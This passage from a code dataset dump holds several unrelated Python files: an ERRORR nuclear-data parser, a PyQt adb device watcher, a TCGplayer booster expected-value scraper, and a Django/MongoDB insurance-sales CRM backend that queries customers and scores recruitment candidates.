if listmat is not None:\n conditions = [tape.index.get_level_values(\"MAT\") == x for x in listmat]\n condition = reduce(lambda x,y: np.logical_or(x, y), conditions)\n tape = tape[condition]\n if listmt is not None:\n conditions = [tape.index.get_level_values(\"MT\") == x for x in listmt]\n condition = reduce(lambda x,y: np.logical_or(x, y), conditions)\n tape = tape[condition]\n mat = self.index.get_level_values(\"MAT\")[0]\n eg = self.read_section(mat,1,451)[\"EG\"]\n ListXs = []\n for ix,text in tape.TEXT.iteritems():\n mat,mf,mt = ix\n X = self.read_section(*ix)\n xs = pd.Series(X[\"XS\"], index=eg[:-1], name=(X[\"MAT\"],X[\"MT\"])).rename_axis(\"E\").to_frame()\n ListXs.append(xs)\n if not ListXs:\n logging.warn(\"requested cross sections were not found\")\n return pd.DataFrame()\n # Use concat instead of merge because indexes are the same\n frame = pd.concat(ListXs, axis=1).reindex(eg, method=\"ffill\")\n return Xs(frame)\n\n def get_std(self):\n \"\"\"\n Extract xs and std from errorr file into dataframe:\n index = energy\n columns = (MAT, MT, DATA)\n \"\"\"\n xs = self.get_xs()\n cov = self.get_cov()\n stdvals = np.sqrt(np.diag(cov.values))\n xsvals = xs.values.T.flatten()\n frame = pd.DataFrame.from_dict({\"XS\" : xsvals, \"STD\" : stdvals})\n frame.columns.name = \"DATA\"\n frame.index = cov.index\n frame = frame.unstack(level=[\"MAT\",\"MT\"])\n frame.columns = frame.columns.reorder_levels([\"MAT\",\"MT\",\"DATA\"])\n return frame","sub_path":"sandy/formats/errorr.py","file_name":"errorr.py","file_ext":"py","file_size_in_byte":2889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"567256052","text":"import sys\nimport os\nimport time\nimport subprocess\nfrom PyQt5.QtCore import QObject, pyqtSignal, pyqtSlot\n\nclass WorkerCheckAdb(QObject):\n addDeviceConnect = pyqtSignal(str, str)\n removeDeviceConnect = pyqtSignal(str)\n\n def __init__(self):\n super().__init__()\n self.deviceConnect = []\n\n def setUpConnect(self,deviceCode):\n deviceName = subprocess.Popen(\"adb -s %s shell getprop ro.product.brand\" % deviceCode, shell=True,\n stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n deviceName = deviceName.stdout.read().strip()\n deviceName = str(deviceName.strip()).strip().split(\"'\")[1]\n # print(\"setUpConnect %s - %s\" % (deviceName, deviceCode))\n self.addDeviceConnect.emit(deviceName,deviceCode)\n\n\n def removeConnect(self,deviceCode):\n self.removeDeviceConnect.emit(deviceCode)\n\n\n def isNotConnect(self,device):\n isNotConnect = device[\"isConnect\"] == False\n if isNotConnect:\n self.removeConnect(device[\"code\"])\n return isNotConnect\n\n @pyqtSlot()\n def runCheck(self):\n while True:\n for device in self.deviceConnect:\n device[\"isConnect\"] = False\n\n result = os.popen(\"adb devices\").read()\n # print(result)\n result = result.split(\"\\n\")\n for item in result:\n if \"\\tdevice\" in item:\n deviceCode = item.split(\"\\tdevice\")[0]\n device = {\"code\": deviceCode, \"isConnect\": False}\n if device not in self.deviceConnect:\n self.deviceConnect.append({\"code\": deviceCode, \"isConnect\": True})\n self.setUpConnect(deviceCode)\n else:\n index = self.deviceConnect.index(device)\n device = self.deviceConnect[index]\n device[\"isConnect\"] = True\n\n self.deviceConnect[:] = [device for device in self.deviceConnect if not self.isNotConnect(device)]\n\n # print(self.deviceConnect)\n 
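            # any device that 'adb devices' did not re-list in this pass still has\n            # isConnect == False and was just dropped (emitting removeDeviceConnect);\n            # the loop then idles for five seconds before polling again.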
time.sleep(5)","sub_path":"tools/android/adbWorker.py","file_name":"adbWorker.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"455604409","text":"import sys\nimport urllib.request\n\n# Marker strings used to walk the price-guide page (the original tag text was not\n# preserved in this copy, so these are placeholders)\nNameString = ' '\nCostString = ' '\nTypeString = ' '\nColorString = ' '\nRarityString = ' '\nHighCostString = ''\nMedCostString = ' '\nLowCostString = ' '\nEndRowString = ' '\n\nclass DoneException(Exception):\n    pass\n\ndef find(contents, string):\n    if not contents[:len(string)] == string:\n        raise DoneException()\n    return contents[len(string):]\n\ndef extract(contents, string, next):\n    contents = find(contents, string)\n    if not contents:\n        raise DoneException()\n    pos = contents.find(next)\n    val = contents[0:pos]\n    return contents[len(val):], val\n\ndef skip(contents, string, next):\n    contents, val = extract(contents, string, next)\n    return contents\n\ndef main(argv):\n    if len(argv) < 1:\n        raise Exception('Usage: ')\n\n    url = 'http://magic.tcgplayer.com/db/price_guide.asp?setname=' + argv[0]\n    # urllib.urlopen() is Python 2 only; decode the response so the str searches below work\n    contents = urllib.request.urlopen(url).read().decode('utf-8', errors='replace')\n\n    pos = contents.find(NameString)\n    if pos == -1:\n        raise Exception('Could not find price list')\n    contents = contents[pos:]\n\n    Costs = { 'R': [[], [], []],\n              'M': [[], [], []]\n            }\n\n    while contents:\n        try:\n            contents, name = extract(contents, NameString, CostString)\n            contents = skip(contents, CostString, TypeString)\n            contents = skip(contents, TypeString, ColorString)\n            contents = skip(contents, ColorString, RarityString)\n            contents, rarity = extract(contents, RarityString, HighCostString)\n            contents, highcost = extract(contents, HighCostString, MedCostString)\n            contents, medcost = extract(contents, MedCostString, LowCostString)\n            contents, lowcost = extract(contents, LowCostString, EndRowString)\n            contents = skip(contents, EndRowString, NameString)\n        except DoneException as e:\n            break\n\n        if rarity != 'R' and rarity != 'M':\n            continue\n\n        highcost = float(highcost[1:].replace(',', ''))\n        medcost = float(medcost[1:].replace(',', ''))\n        lowcost = float(lowcost[1:].replace(',', ''))\n\n        Costs[rarity][0].append(highcost)\n        Costs[rarity][1].append(medcost)\n        Costs[rarity][2].append(lowcost)\n\n    def triple(rarity):\n        high = sum(Costs[rarity][0]) / len(Costs[rarity][0])\n        med = sum(Costs[rarity][1]) / len(Costs[rarity][1])\n        cost = sum(Costs[rarity][2]) / len(Costs[rarity][2])\n        return high, med, cost\n\n    try:\n        mythics = triple('M')\n    except ZeroDivisionError:  # the set contains no mythics\n        mythics = None\n    rares = triple('R')\n\n    def apply(c):\n        if not mythics:\n            return rares[c]\n        return ((7.0 / 8.0) * rares[c]) + ((1.0 / 8.0) * mythics[c])\n\n    high = apply(0)\n    med = apply(1)\n    low = apply(2)\n    print('High EV: ' + str(high))\n    print('Med EV: ' + str(med))\n    print('Low EV: ' + str(low))\n\nif __name__ == '__main__':\n    main(sys.argv[1:])\n\n","sub_path":"booster_ev.py","file_name":"booster_ev.py","file_ext":"py","file_size_in_byte":3355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"33395735","text":"import json\nimport datetime\n#from datetime import datetime\nfrom django.http import HttpResponse\nimport cmdb.utils as ResultUtils\nimport cmdb.utils_pymongo as mongoUtiliy\nimport cmdb.utils_biz_model as CommonModelUtils\nimport operator\nimport random\nfrom functools import reduce\nfrom Ringball_django.settings import logger\n\n# pymongo initialization\ndb = mongoUtiliy.MongodbOperate()\nmongoDB = 'Ringball'\n\n\n# # Insert data (create)\n# def insert(request):  # On the first request, return a page with two input fields\n# 
error_msg = '用户注册成功'\n#\n# customer=LpMgntCustMst()\n# id = request.POST['id']\n# if id == None :\n# customer.id = ResultUtils.getUUID()\n# else:\n# customer.id = id\n# customer.src = request.POST['src']\n# customer.phase = request.POST['phase']\n# customer.sex = request.POST['sex']\n# customer.birth_date = request.POST['birth_date']\n# customer.address = request.POST['address']\n# customer.marriage = request.POST['marriage']\n# customer.child = request.POST['child']\n# customer.industry = request.POST['industry']\n# customer.yearly_income = request.POST['yearly_income']\n# customer.yearly_expense = request.POST['yearly_expense']\n# customer.house = request.POST['house']\n# customer.car = request.POST['car']\n# customer.health_check = request.POST['health_check']\n# customer.smoke = request.POST['smoke']\n# customer.alcohol = request.POST['alcohol']\n# customer.phone_no = request.POST['phone_no']\n# customer.phone_nm = request.POST['phone_nm']\n# customer.phone_company = request.POST['phone_company']\n# customer.phone_role = request.POST['phone_role']\n# customer.phone_email = request.POST['phone_email']\n# customer.phone_address = request.POST['phone_address']\n# customer.phone_group = request.POST['phone_group']\n# customer.wechat_no = request.POST['wechat_no']\n# customer.wechat_nm = request.POST['wechat_nm']\n# customer.wechat_memo = request.POST['wechat_memo']\n# customer.wechat_img = request.POST['wechat_img']\n# customer.wechat_country = request.POST['wechat_country']\n# customer.wechat_city = request.POST['wechat_city']\n# customer.wechat_signature = request.POST['wechat_signature']\n# customer.wechat_phone = request.POST['wechat_phone']\n# customer.wechat_linkedin = request.POST['wechat_linkedin']\n# customer.wechat_group = request.POST['wechat_group']\n# customer.wechat_samegroup = request.POST['wechat_samegroup']\n# customer.weibo_id = request.POST['weibo_id']\n# customer.create_date = datetime.datetime.now()\n# customer.update_date = datetime.datetime.now()\n# customer.status = '1'\n# customer.save()\n# # 新增或更新跑批表记录,为跑批准备\n# CommonModelUtils.saveOrUpdateLpDsSchedule(customer.id, '0')\n#\n# return HttpResponse(ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_SUCCESS, error_msg, []))\n\n#####-------------- JASON ADDED BEGIN 20190617 ---------------######\n# 客户基本信息取得\ndef queryByID(request):\n error_msg = ''\n\n if request.method == \"POST\":\n sales_id = request.POST.get('sales_id')\n cust_id = request.POST.get('cust_id')\n sort_name = request.POST.get('sort_name')\n is_reverse = request.POST.get('is_reverse')\n\n logger.info(sales_id)\n # page_size = 0\n # if request.POST.get('page_size'):\n # page_size = int(request.POST.get('page_size'))\n #\n # page_num = 0\n # if request.POST.get('page_num'):\n # page_num = int(request.POST.get('page_num'))\n # sort = None\n # if request.POST.get('sort'):\n # sort = {}\n # sp = request.POST.get('sort').split(\",\")\n # for r in sp:\n # s = r.split(\":\")\n # sort[s[0]]=int(s[1])\n\n # work_dt = request.POST.get('work_date')\n # if work_dt==None:\n # work_dt = datetime.now().strftime(\"%Y-%m-%d\")\n # logger.info(work_dt)\n temp_data = [\n {\n \"$match\": {\n \"status\": \"1\",\n \"sales_id\": sales_id\n }\n },\n {\n \"$project\": {\n \"_id\": 0,\n 'sales_id': 1,\n 'cust_id': 1,\n 'src': 1,\n 'phase': 1,\n 'sex': 1,\n 'birth_date': 1,\n 'zipcode': 1,\n 'address': 1,\n 'marriage': 1,\n 'child': 1,\n 'parent': 1,\n 'industry': 1,\n 'profession': 1,\n 'yearly_income': 1,\n 'yearly_expense': 1,\n 'house': 1,\n 'house_loan': 1,\n 
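# In a $project stage, 1 includes a field and \"_id\": 0 suppresses the default\n                    # _id; computed entries reshape values inline, e.g. the $substr expression\n                    # on last_touch_date below keeps only the YYYY-MM-DD prefix.\n                    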
'car': 1,\n 'car_loan': 1,\n 'health_check': 1,\n 'smoke': 1,\n 'alcohol': 1,\n 'sick': 1,\n 'credit': 1,\n 'ext_city': 1,\n 'ext_age': 1,\n 'ext_age_from': 1,\n 'ext_age_to': 1,\n 'ext_consumption': 1,\n 'ext_has_pupil': 1,\n 'ext_has_junior': 1,\n 'ext_like_stock': 1,\n 'ext_like_finance': 1,\n 'ext_like_bank': 1,\n 'ext_like_creditcard': 1,\n 'ext_like_businesstrip': 1,\n 'ext_like_travel': 1,\n 'ext_like_health': 1,\n 'ext_like_didi': 1,\n 'ext_like_map': 1,\n 'ext_like_child': 1,\n 'phone_no': 1,\n 'phone_nm': 1,\n 'phone_company': 1,\n 'phone_role': 1,\n 'phone_email': 1,\n 'phone_address': 1,\n 'phone_group': 1,\n 'wechat_no': 1,\n 'wechat_nm': 1,\n 'wechat_memo': 1,\n 'wechat_img': 1,\n 'wechat_country': 1,\n 'wechat_city': 1,\n 'wechat_signature': 1,\n 'wechat_phone': 1,\n 'wechat_linkedin': 1,\n 'wechat_group': 1,\n 'wechat_samegroup': 1,\n 'weibo_id': 1,\n 'linkedin_id': 1,\n \"last_touch_date\": {\n \"$substr\": [\"$last_touch_date\", 0, 10]\n },\n 'last_touch_type': 1,\n 'create_date': 1,\n 'update_date': 1,\n 'isused': 1,\n 'status': 1,\n 'star_flg': 1,\n 'used_ticket': 1,\n }\n }\n ]\n\n logger.info(\"query cust mst begin\" + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n# logger.info(temp_data)\n if cust_id != None and len(cust_id.strip()) != 0:\n temp_data[0]['$match']['cust_id'] = cust_id\n logger.debug(temp_data)\n ret = db.aggregate(mongoDB, 'LP_MGNT_CUST_MST', temp_data, request.POST.get('page_size'),\n request.POST.get('page_num'), '')\n else:\n logger.debug(temp_data)\n ret = db.aggregate(mongoDB, 'LP_MGNT_CUST_MST', temp_data, request.POST.get('page_size'),\n request.POST.get('page_num'), '')\n\n logger.info(\"query cust mst end\" + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n\n if ret['result'] == 1:\n return HttpResponse(\n ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, ret['ret'], []))\n else:\n # 逐条获取该客户的score,不存在时则设置为随机数\n # 获取客户列表数据\n retcust = ret['ret']\n\n if len(retcust) > 0:\n # retval用于保存待返回的数组\n retval = []\n\n temp_data = [\n {\n \"$match\": {\n \"status\": \"1\",\n \"sales_id\": sales_id\n }\n },\n {\n \"$project\": {\n \"_id\": 0,\n 'cust_id': 1,\n 'score': 1,\n\n }\n }\n ]\n\n if cust_id != None and len(cust_id.strip()) != 0:\n temp_data[0]['$match']['cust_id'] = cust_id\n\n scroeRet = db.aggregate(mongoDB, 'LP_SCORE_RESULT_LABEL_LASTEST', temp_data)\n scroelist = {}\n for r in scroeRet['ret']:\n scroelist[r['cust_id']]=str(r['score'])\n\n for rc in retcust:\n if rc['cust_id'] in scroelist.keys():\n rc['score'] = str(scroelist[rc['cust_id']])\n else:\n # TODO: 还没有跑模型之前,设置一个临时分数\n# last_chr = rc['cust_id'][-1]\n# last_num = ord(last_chr)\n# last_num = last_num % 15\n# rc['score'] = str(10 + last_num)\n rc['score'] = \"--\"\n\n # 灵豹分是拼装,不能在aggrerate中排序。拼装后排序\n if sort_name != None and is_reverse != None:\n sorted_result = sorted(retcust,key=operator.itemgetter(sort_name),reverse=int(is_reverse))\n else:\n sorted_result = sorted(retcust, key=operator.itemgetter(\"score\"), reverse=True)\n\n return HttpResponse(\n ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_SUCCESS, error_msg, sorted_result))\n\n # logger.info(\"query lastest score begin\" + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n #\n # try:\n # for rc in retcust:\n # logger.info(\"loop begin\" + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n #\n # retscore = db.query(mongoDB, 'LP_SCORE_RESULT_LABEL_LASTEST', {'cust_id': rc['cust_id'], 'status': '1'})\n #\n # # 在retval中添加score\n # if retscore.count() > 0:\n # 
rc['score'] = retscore[0]['score']\n # else:\n # rc['score'] = 0\n #\n # retval.append(rc)\n #\n # logger.info(\"loop end\" + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n #\n # logger.info(\"query lastest score end\" + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n #\n # return HttpResponse(\n # ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_SUCCESS, error_msg, retval))\n #\n # except Exception as e:\n # return HttpResponse(ResultUtils.createErrorResult(e))\n else:\n return HttpResponse(\n ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_SUCCESS, \"数据不存在\", []))\n else:\n return HttpResponse(ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, \"请联系管理员\", []))\n\n\n# 客户基本信息取得(增员小助理)\ndef queryByIDTeam(request):\n error_msg = ''\n\n if request.method == \"POST\":\n sales_id = request.POST.get('sales_id')\n cust_id = request.POST.get('cust_id')\n sort_name = request.POST.get('sort_name')\n is_reverse = request.POST.get('is_reverse')\n\n logger.info(sales_id)\n temp_data = [\n {\n \"$match\": {\n \"status\": \"1\",\n \"sales_id\": sales_id\n }\n },\n {\n \"$project\": {\n \"_id\": 0,\n 'sales_id': 1,\n 'src': 1,\n 'cust_id': 1,\n 'sex': 1,\n 'birth_date': 1,\n 'marriage': 1,\n 'child': 1,\n 'industry': 1,\n 'profession': 1,\n 'yearly_income': 1,\n 'yearly_expense': 1,\n 'house': 1,\n 'house_loan': 1,\n 'car': 1,\n 'car_loan': 1,\n 'ext_city': 1,\n 'ext_age': 1,\n 'ext_age_from': 1,\n 'ext_age_to': 1,\n 'ext_consumption': 1,\n 'ext_has_pupil': 1,\n 'ext_has_junior': 1,\n 'phone_no': 1,\n 'phone_nm': 1,\n 'wechat_no': 1,\n 'wechat_nm': 1,\n 'wechat_memo': 1,\n \"last_touch_date\": {\n \"$substr\": [\"$last_touch_date\", 0, 10]\n },\n 'status': 1,\n }\n }\n ]\n\n logger.info(\"query cust mst begin\" + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n if cust_id != None and len(cust_id.strip()) != 0:\n temp_data[0]['$match']['cust_id'] = cust_id\n logger.debug(temp_data)\n ret = db.aggregate(mongoDB, 'LP_MGNT_CUST_MST', temp_data, request.POST.get('page_size'),\n request.POST.get('page_num'), '')\n else:\n logger.debug(temp_data)\n ret = db.aggregate(mongoDB, 'LP_MGNT_CUST_MST', temp_data, request.POST.get('page_size'),\n request.POST.get('page_num'), '')\n\n logger.info(\"query cust mst end\" + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n\n if ret['result'] == 1:\n return HttpResponse(\n ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, ret['ret'], []))\n else:\n # 逐条获取该客户的score,不存在时则设置为随机数\n # 获取客户列表数据\n retcust = ret['ret']\n\n if len(retcust) > 0:\n # retval用于保存待返回的数组\n retval = []\n\n temp_data = [\n {\n \"$match\": {\n \"status\": \"1\",\n \"sales_id\": sales_id,\n }\n },\n {\n \"$project\": {\n \"_id\": 0,\n 'cust_id': 1,\n 'evaluate_score': 1, #增员潜力评估(0:未评估;A:高;B:中;C:低;D:未知)\n 'fact_1': 1, #评估维度1(收入,A:2万以上,B:1万以上,C:5千以上,D:其他)\n 'fact_2': 1, #评估维度2(年龄,A:30-40岁,B:40-50岁,C:20-30岁,D:其他)\n 'fact_3': 1, #评估维度3(婚姻,A:已婚,B:未婚,C:离婚,D:其他)\n 'fact_4': 1, #评估维度4(职业,A:专业人士,B:营销类,C:私营业主,D:其他)\n 'fact_5': 1, #评估维度5(学历,A:大学,B:大专,C:高中,D:其他)\n 'fact_6': 1, #评估维度6(认识时间,A:3年以上,B:1年以上,C:半年不到,D:其他)\n 'fact_7': 1, #评估维度7(工作年限,A:5年以上,B:3年以上,C:1年以上,D:其他)\n 'memo': 1, #备注\n }\n }\n ]\n\n if cust_id != None and len(cust_id.strip()) != 0:\n temp_data[0]['$match']['cust_id'] = cust_id\n\n scroeRet = db.aggregate(mongoDB, 'LP_TEAM_EVALUATE', temp_data)\n scroelist = {}\n for r in scroeRet['ret']:\n scroelist[r['cust_id']]=str(r['evaluate_score'])\n\n for rc in retcust:\n if rc['cust_id'] in scroelist.keys():\n 
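# Equivalent, more idiomatic lookup-with-fallback for this if/else:\n                        #     rc['evaluate_score'] = str(scroelist.get(rc['cust_id'], \"X\"))\n                        # dict.get() returns the fallback when the key is absent.\n                        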
rc['evaluate_score'] = str(scroelist[rc['cust_id']])\n else:\n rc['evaluate_score'] = \"X\"\n\n if sort_name != None and is_reverse != None:\n sorted_result = sorted(retcust,key=operator.itemgetter(sort_name),reverse=int(is_reverse))\n else:\n sorted_result = sorted(retcust, key=operator.itemgetter(\"evaluate_score\"), reverse=True)\n\n return HttpResponse(\n ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_SUCCESS, error_msg, sorted_result))\n else:\n return HttpResponse(\n ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_SUCCESS, \"数据不存在\", []))\n else:\n return HttpResponse(ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, \"请联系管理员\", []))\n\n#插入增员评估\ndef insertTeamEvaluateByCustID(request):\n error_msg = '增员评估追加成功'\n\n if request.method == \"POST\":\n sales_id = request.POST.get('sales_id', None)\n cust_id = request.POST.get('cust_id', None)\n team_type = request.POST.get('team_type', None)\n fact_1 = request.POST.get('fact_1', None)\n fact_2 = request.POST.get('fact_2', None)\n fact_3 = request.POST.get('fact_3', None)\n fact_4 = request.POST.get('fact_4', None)\n fact_5 = request.POST.get('fact_5', None)\n fact_6 = request.POST.get('fact_6', None)\n fact_7 = request.POST.get('fact_7', None)\n memo = request.POST.get('memo', None)\n\n # 计算增员潜力值\n # 总分大于等于23分,高A;总分大于等于13,中B,总分大于0时,低C,总分为0时,未知D\n score = 0\n # 学历\n if fact_1 == \"B\":\n score = score + 5\n elif fact_1 == \"A\":\n score = score + 3\n elif fact_1 == \"C\":\n score = score + 1\n\n # 年龄\n if fact_2 == \"A\":\n score = score + 5\n elif fact_2 == \"B\":\n score = score + 3\n elif fact_2 == \"C\":\n score = score + 1\n\n # 婚姻\n if fact_3 == \"A\":\n score = score + 5\n elif fact_3 == \"B\":\n score = score + 3\n elif fact_3 == \"C\":\n score = score + 1\n\n # 职业\n if fact_4 == \"A\":\n score = score + 5\n elif fact_4 == \"B\":\n score = score + 3\n elif fact_4 == \"C\":\n score = score + 1\n\n # 学历\n if fact_5 == \"B\":\n score = score + 5\n elif fact_5 == \"A\":\n score = score + 3\n elif fact_5 == \"C\":\n score = score + 1\n\n # 认识时间\n if fact_6 == \"A\":\n score = score + 5\n elif fact_6 == \"B\":\n score = score + 3\n elif fact_6 == \"C\":\n score = score + 1\n\n # 工作年限\n if fact_7 == \"A\":\n score = score + 5\n elif fact_7 == \"B\":\n score = score + 3\n elif fact_7 == \"C\":\n score = score + 1\n\n if score >= 21:\n evaluate_score = \"A\"\n elif score >= 12:\n evaluate_score = \"B\"\n elif score >= 1:\n evaluate_score = \"C\"\n else:\n evaluate_score = \"D\"\n\n try:\n ret_exist = db.query(mongoDB, 'LP_TEAM_EVALUATE', {'sales_id': sales_id, 'cust_id': cust_id, 'status': '1'})\n\n # 如果没有评估过,插入记录\n if ret_exist.count() == 0:\n logger.info(\"lp_team_evaluate insert begin\")\n\n ret = {}\n ret['sales_id'] = sales_id\n ret['cust_id'] = cust_id\n ret['team_type'] = team_type\n ret['evaluate_score'] = evaluate_score\n ret['fact_1'] = fact_1\n ret['fact_2'] = fact_2\n ret['fact_3'] = fact_3\n ret['fact_4'] = fact_4\n ret['fact_5'] = fact_5\n ret['fact_6'] = fact_6\n ret['fact_7'] = fact_7\n ret['memo'] = memo\n ret['create_date'] = ResultUtils.getNowToStr()\n ret['update_date'] = ResultUtils.getNowToStr()\n ret['status'] = '1'\n\n f = db.insert_item(mongoDB, 'LP_TEAM_EVALUATE', ret)\n logger.debug(f)\n else:\n f = db.update_item(mongoDB, 'LP_TEAM_EVALUATE', {'sales_id':sales_id, 'cust_id':cust_id, 'status': '1'},\n {'$set':{'team_type':team_type, 'evaluate_score':evaluate_score, 'fact_1':fact_1,\n 'fact_2': fact_2, 'fact_3': fact_3,\n 'fact_4': fact_4, 'fact_5': fact_5,\n 'fact_6': 
fact_6, 'fact_7': fact_7, 'memo': memo,\n 'update_date':ResultUtils.getNowToStr()}})\n logger.debug(f)\n\n return HttpResponse(\n ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_SUCCESS, error_msg,\n [{'evaluate_score': evaluate_score}]))\n\n except Exception as e:\n return HttpResponse(ResultUtils.createErrorResult(e))\n else:\n return HttpResponse(\n ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, \"请联系管理员\", []))\n\n# 检索\ndef queryTeamEvaluateByCustID(request):\n error_msg = '增员评估检索成功'\n\n if request.method == \"POST\":\n sales_id = request.POST.get('sales_id')\n cust_id = request.POST.get('cust_id')\n\n temp_data = [\n {\n \"$match\": {\n \"status\": \"1\",\n \"sales_id\": sales_id,\n \"cust_id\": cust_id,\n }\n },\n {\n \"$project\": {\n \"_id\": 0,\n 'cust_id': 1,\n 'team_type': 1, # 增员来源\n 'evaluate_score': 1, # 增员潜力评估(X:未评估;A:高;B:中;C:低;D:未知)\n 'fact_1': 1, # 评估维度1(收入,A:2万以上,B:1万以上,C:5千以上,D:其他)\n 'fact_2': 1, # 评估维度2(年龄,A:30-40岁,B:40-50岁,C:20-30岁,D:其他)\n 'fact_3': 1, # 评估维度3(婚姻,A:已婚,B:未婚,C:离婚,D:其他)\n 'fact_4': 1, # 评估维度4(职业,A:专业人士,B:营销类,C:私营业主,D:其他)\n 'fact_5': 1, # 评估维度5(学历,A:大学,B:大专,C:高中,D:其他)\n 'fact_6': 1, # 评估维度6(认识时间,A:3年以上,B:1年以上,C:半年不到,D:其他)\n 'fact_7': 1, # 评估维度7(工作年限,A:5年以上,B:3年以上,C:1年以上,D:其他)\n 'memo': 1, # 备注\n }\n }\n ]\n\n logger.debug(temp_data)\n\n ret = db.aggregate(mongoDB, 'LP_TEAM_EVALUATE', temp_data)\n\n if ret['result'] == 1:\n return HttpResponse(\n ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, ret['ret'], []))\n else:\n return HttpResponse(\n ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_SUCCESS, \"抽取成功\", ret['ret']))\n else:\n return HttpResponse(ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, \"请联系管理员\", []))\n\ndef delByID(request):\n if request.method == \"POST\":\n cust_id = request.POST.get('cust_id')\n\n if cust_id == None or len(cust_id.strip()) == 0:\n return HttpResponse(ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, \"cust id不能为空\", []))\n\n cust_ids = cust_id.split(\"#\")\n\n for cust_idx in cust_ids:\n if cust_idx != None and len(cust_idx.strip()) > 0:\n db.update_item(mongoDB, 'LP_MGNT_CUST_MST', {'cust_id':cust_idx}, {'$set':{'status':'0'}})\n\n return HttpResponse(\n ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_SUCCESS, '客户删除成功', []))\n else:\n return HttpResponse(ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, \"请联系管理员\", []))\n\n\n# 更新数据\n# def update(request): # 第一次请求页面的时候,返回一个页面,页面有两个填写框\n# error_msg = '更新成功'\n#\n# if request.method == \"POST\":\n# id = request.POST['id']\n# logger.info(id)\n# customer = LpMgntCustMst.objects.get(id=id)\n# customer.src = ResultUtils.isUpdateValueNull(request.POST['src'],customer.src)\n# customer.phase = ResultUtils.isUpdateValueNull(request.POST['phase'],customer.phase)\n# customer.sex = ResultUtils.isUpdateValueNull(request.POST['sex'],customer.sex)\n# customer.birth_date = ResultUtils.isUpdateValueNull(request.POST['birth_date'],customer.birth_date)\n# customer.address = ResultUtils.isUpdateValueNull(request.POST['address'],customer.address)\n# customer.marriage = ResultUtils.isUpdateValueNull(request.POST['marriage'],customer.marriage)\n# customer.child = ResultUtils.isUpdateValueNull(request.POST['child'],customer.child)\n# customer.industry = ResultUtils.isUpdateValueNull(request.POST['industry'],customer.industry)\n# customer.yearly_income = ResultUtils.isUpdateValueNull(request.POST['yearly_income'],customer.yearly_income)\n# customer.yearly_expense = 
ResultUtils.isUpdateValueNull(request.POST['yearly_expense'],customer.yearly_expense)\n# customer.house = ResultUtils.isUpdateValueNull(request.POST['house'],customer.house)\n# customer.car = ResultUtils.isUpdateValueNull(request.POST['car'],customer.car)\n# customer.health_check = ResultUtils.isUpdateValueNull(request.POST['health_check'],customer.health_check)\n# customer.smoke = ResultUtils.isUpdateValueNull(request.POST['smoke'],customer.smoke)\n# customer.alcohol = ResultUtils.isUpdateValueNull(request.POST['alcohol'],customer.alcohol)\n# customer.phone_no = ResultUtils.isUpdateValueNull(request.POST['phone_no'],customer.phone_no)\n# customer.phone_nm = ResultUtils.isUpdateValueNull(request.POST['phone_nm'],customer.phone_nm)\n# customer.phone_company = ResultUtils.isUpdateValueNull(request.POST['phone_company'],customer.phone_company)\n# customer.phone_role = ResultUtils.isUpdateValueNull(request.POST['phone_role'],customer.phone_role)\n# customer.phone_email = ResultUtils.isUpdateValueNull(request.POST['phone_email'],customer.phone_email)\n# customer.phone_address = ResultUtils.isUpdateValueNull(request.POST['phone_address'],customer.phone_address)\n# customer.phone_group = ResultUtils.isUpdateValueNull(request.POST['phone_group'],customer.phone_group)\n# customer.wechat_no = ResultUtils.isUpdateValueNull(request.POST['wechat_no'],customer.wechat_no)\n# customer.wechat_nm = ResultUtils.isUpdateValueNull(request.POST['wechat_nm'],customer.wechat_nm)\n# customer.wechat_memo = ResultUtils.isUpdateValueNull(request.POST['wechat_memo'],customer.wechat_memo)\n# customer.wechat_img = ResultUtils.isUpdateValueNull(request.POST['wechat_img'],customer.wechat_img)\n# customer.wechat_country = ResultUtils.isUpdateValueNull(request.POST['wechat_country'],customer.wechat_country)\n# customer.wechat_city = ResultUtils.isUpdateValueNull(request.POST['wechat_city'],customer.wechat_city)\n# customer.wechat_signature = ResultUtils.isUpdateValueNull(request.POST['wechat_signature'],customer.wechat_signature)\n# customer.wechat_phone = ResultUtils.isUpdateValueNull(request.POST['wechat_phone'],customer.wechat_phone)\n# customer.wechat_linkedin = ResultUtils.isUpdateValueNull(request.POST['wechat_linkedin'],customer.wechat_linkedin)\n# customer.wechat_group = ResultUtils.isUpdateValueNull(request.POST['wechat_group'],customer.wechat_group )\n# customer.wechat_samegroup = ResultUtils.isUpdateValueNull(request.POST['wechat_samegroup'],customer.wechat_samegroup )\n# customer.weibo_id = ResultUtils.isUpdateValueNull(request.POST['weibo_id'],customer.weibo_id )\n# customer.update_date = datetime.datetime.now()\n# customer.status = 